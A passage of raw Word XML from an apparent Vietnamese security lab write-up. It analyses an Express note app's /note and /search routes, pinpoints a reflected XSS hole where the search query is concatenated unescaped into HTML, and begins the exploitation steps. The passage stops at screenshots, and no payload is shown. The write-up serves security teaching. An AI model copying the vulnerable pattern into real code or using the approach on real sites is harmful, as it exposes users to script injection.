          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> tập trung phân tích và mô tả phần xử lý liên quan tới form /note và endpoint /note phía </w:t>
      </w:r>
      <w:r w:rsidR="007E69E0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>server:</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D318D0" w:rsidRPr="00D318D0" w14:paraId="11A817FD" w14:textId="77777777" w:rsidTr="007511B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A838554" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="229ED0A4" w14:textId="24AAA2B4" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B6F76C" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="233ECDE4" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B6D6DA2" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7013B677" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F4BF289" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FA43C9F" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AB68B36" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08075C3B" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D69ED19" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03B98B43" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:lastRenderedPageBreak/>
              <w:t>router.get('/note', function (req, res, next) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00203F25" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t xml:space="preserve">    res.json(req.session.notes);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70230B96" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t>});</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B806C96" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58D2785A" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t>//Add note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D6007F0" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t>router.post('/note', function (req, res, next) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="081D439B" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    req.session.notes.push(req.body.note);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B73460" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t xml:space="preserve">    res.send("OK");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40612104" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t>});</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="693C5DA2" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BE0FF1F" w14:textId="77777777" w:rsidR="00D318D0" w:rsidRPr="00D318D0" w:rsidRDefault="00D318D0" w:rsidP="00D318D0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D318D0">
              <w:t>module.exports = router;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="389AE00A" w14:textId="64B35EC6" w:rsidR="00D34F03" w:rsidRPr="00D34F03" w:rsidRDefault="00D34F03" w:rsidP="00D34F03">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34F03">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Đoạn </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r w:rsidRPr="00D34F03">
        <w:t>định nghĩa hai route cho Express:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2891AA0A" w14:textId="1F4E44DF" w:rsidR="00D34F03" w:rsidRPr="00D34F03" w:rsidRDefault="00D34F03" w:rsidP="00A00E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34F03">
        <w:t>GET /note trả về danh sách ghi chú lưu trong req.session.notes dưới dạng JSON</w:t>
      </w:r>
      <w:r w:rsidR="00A00E0B">
        <w:t xml:space="preserve"> bằng cách gọi </w:t>
      </w:r>
      <w:r w:rsidR="00A00E0B" w:rsidRPr="00A00E0B">
        <w:t>res.json(req.session.notes) để serialize và trả mảng notes hiện có trong session.</w:t>
      </w:r>
      <w:r w:rsidR="00A00E0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A00E0B" w:rsidRPr="00A00E0B">
        <w:t xml:space="preserve">Nếu req.session.notes là undefined, res.json(undefined) sẽ trả null hoặc gây ra hành vi không mong muốn ở </w:t>
      </w:r>
      <w:r w:rsidR="00A00E0B">
        <w:t>client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0866A148" w14:textId="556FBE33" w:rsidR="00224C41" w:rsidRPr="00224C41" w:rsidRDefault="00D34F03" w:rsidP="00224C41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34F03">
        <w:t>POST /note thêm giá trị req.body.note vào mảng req.session.notes rồi trả về chuỗi "OK"</w:t>
      </w:r>
      <w:r w:rsidR="00224C41">
        <w:t xml:space="preserve"> bằng cách</w:t>
      </w:r>
      <w:r w:rsidR="00224C41" w:rsidRPr="00224C41">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00224C41">
        <w:t xml:space="preserve">gọi </w:t>
      </w:r>
      <w:r w:rsidR="00224C41" w:rsidRPr="00224C41">
        <w:t>req.session.notes.push(req.body.note) trực tiếp</w:t>
      </w:r>
      <w:r w:rsidR="00224C41">
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
      <w:r w:rsidR="00224C41" w:rsidRPr="00224C41">
        <w:t>hông có kiểm tra kiểu, độ dài, hay sanitize trước khi lưu.</w:t>
      </w:r>
      <w:r w:rsidR="00224C41" w:rsidRPr="00224C41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00224C41">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00224C41" w:rsidRPr="00224C41">
        <w:t>Trả res.send("OK") (HTTP 200 text) mà không cung cấp mã trạng thái rõ ràng hoặc JSON có cấu trúc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A282D44" w14:textId="42C84863" w:rsidR="00D318D0" w:rsidRDefault="00E9212C" w:rsidP="00E9212C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Đoạn code này cũng có khả năng có thể gây ra XSS ở việc lưu trực tiếp req.body.note mà không </w:t>
      </w:r>
      <w:r w:rsidR="00522D24">
        <w:t>escape/</w:t>
      </w:r>
      <w:r w:rsidR="006E21A5">
        <w:t>sanitize</w:t>
      </w:r>
      <w:r w:rsidR="00E25A7F">
        <w:t xml:space="preserve">, tạo nguy hiểm nếu các giá trị được lưu này được sử dụng để render vào HTML trực tiếp.Tuy nhiên ở trong đoạn code này chỉ sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="00E25A7F" w:rsidRPr="00D318D0">
        <w:t>res.json</w:t>
      </w:r>
      <w:r w:rsidR="00E25A7F">
        <w:t xml:space="preserve"> để in ra nên chưa gây nguy hiểm. Vì vậy tiếp tục kiểm tra đoạn code liên quan đến </w:t>
      </w:r>
      <w:r w:rsidR="001176ED" w:rsidRPr="00A82B37">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>form /</w:t>
      </w:r>
      <w:r w:rsidR="001176ED">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r w:rsidR="001176ED" w:rsidRPr="00A82B37">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> và endpoint /</w:t>
      </w:r>
      <w:r w:rsidR="001176ED">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">search: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431"/>
      </w:tblGrid>
      <w:tr w:rsidR="009776BE" w:rsidRPr="009776BE" w14:paraId="54AD7A50" w14:textId="77777777" w:rsidTr="009776BE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="176D6C91" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BEABAEF" w14:textId="1ECFCAFA" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57124EDF" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74689800" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B9C33C7" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="627B5C31" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="318CAA3B" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C6B5885" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D2FE445" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="715511F1" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="679E3373" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B28A802" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t>router.get('/', function (req, res, next) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21C2176A" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t xml:space="preserve">    res.render('index');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E090A50" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t>});</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BDD5982" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65BF9DC6" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t>// Note search feature</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0314B510" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t>router.get('/search', function (req, res, next) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C72CB27" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t xml:space="preserve">    html = 'Your search - &lt;b&gt;' + req.query.q + '&lt;/b&gt; - did not match any notes.&lt;br&gt;&lt;br&gt;'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AE874AE" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t xml:space="preserve">    res.send(html);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72D11C10" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t>});</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B2E7E88" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21B916D4" w14:textId="77777777" w:rsidR="009776BE" w:rsidRPr="009776BE" w:rsidRDefault="009776BE" w:rsidP="009776BE">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009776BE">
              <w:t>module.exports = router;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34EC2048" w14:textId="693CCA39" w:rsidR="00E7566B" w:rsidRPr="00E7566B" w:rsidRDefault="00E7566B" w:rsidP="00E7566B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E7566B">
        <w:t>Đoạn code định nghĩa hai route:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619F2F2A" w14:textId="77777777" w:rsidR="00E7566B" w:rsidRPr="00E7566B" w:rsidRDefault="00E7566B" w:rsidP="00E7566B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E7566B">
        <w:t>GET / trả view index bằng res.render('index').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E14343" w14:textId="77777777" w:rsidR="00E7566B" w:rsidRPr="00E7566B" w:rsidRDefault="00E7566B" w:rsidP="00E7566B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E7566B">
        <w:t>GET /search xây dựng chuỗi HTML bằng cách nối trực tiếp req.query.q vào biến html rồi gửi bằng res.send(html).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000AFF9" w14:textId="3D416D28" w:rsidR="007511B8" w:rsidRDefault="00E7566B" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Từ kết quả này có thể thấy </w:t>
      </w:r>
      <w:r w:rsidR="006E21A5">
        <w:t>rằng ở /search lấy thẳng giá trị q được nhập vào rồi in ra trực tiếp luôn mà không escape/sanitize</w:t>
      </w:r>
      <w:r w:rsidR="000A7F0B">
        <w:t xml:space="preserve"> mà không kiểm tra trong notes. Từ đây có thể chắc chắn rằng đây là vị trí để tấn công XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495F478" w14:textId="77777777" w:rsidR="000A7F0B" w:rsidRPr="00CF619D" w:rsidRDefault="000A7F0B" w:rsidP="000A7F0B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D09587" w14:textId="7183338C" w:rsidR="000A7F0B" w:rsidRPr="000A1BFF" w:rsidRDefault="000A7F0B" w:rsidP="000A7F0B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện XSS bằng cách chèn trực tiếp vào trường search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48055880" w14:textId="77777777" w:rsidR="000A7F0B" w:rsidRDefault="000A7F0B" w:rsidP="000A7F0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA2709" w14:textId="78660A6E" w:rsidR="006F7E90" w:rsidRPr="006F7E90" w:rsidRDefault="006F7E90" w:rsidP="000A7F0B">
      <w:r>
        <w:t xml:space="preserve">Truy </w:t>
      </w:r>
      <w:r w:rsidR="0070276C">
        <w:t xml:space="preserve">cập vào </w:t>
      </w:r>
      <w:r w:rsidR="00E17AB3">
        <w:t>giao diện web của bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F8F3CE" w14:textId="20E45561" w:rsidR="00B05004" w:rsidRDefault="00B05004" w:rsidP="000A7F0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B05004">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72AC1ED6" wp14:editId="37B1B8CE">
            <wp:extent cx="5731510" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="354275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75708" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2962275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E237E7" w14:textId="0B0E7F8C" w:rsidR="00E17AB3" w:rsidRDefault="00E17AB3" w:rsidP="00E12C5B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E17AB3">
        <w:t xml:space="preserve">Giao diện web hiển thị </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">các chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00255401">
        <w:t xml:space="preserve">thêm giá trị note và search cùng với </w:t>
      </w:r>
      <w:r w:rsidR="00E14E4D">
        <w:t>dòng chữ List note để khi ấn vào sẽ hiện danh sách note đã được thêm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5F5E1" w14:textId="080D903C" w:rsidR="004E3AA5" w:rsidRPr="00B262DD" w:rsidRDefault="00E14E4D" w:rsidP="000A7F0B">
      <w:r>
        <w:t>Thực hiện tạo một note abc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438EF402" w14:textId="06BD79C7" w:rsidR="00B05004" w:rsidRDefault="004E3AA5" w:rsidP="000A7F0B">
      <w:r w:rsidRPr="004E3AA5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DF56A83" wp14:editId="0C4E340C">
            <wp:extent cx="5731510" cy="2249170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
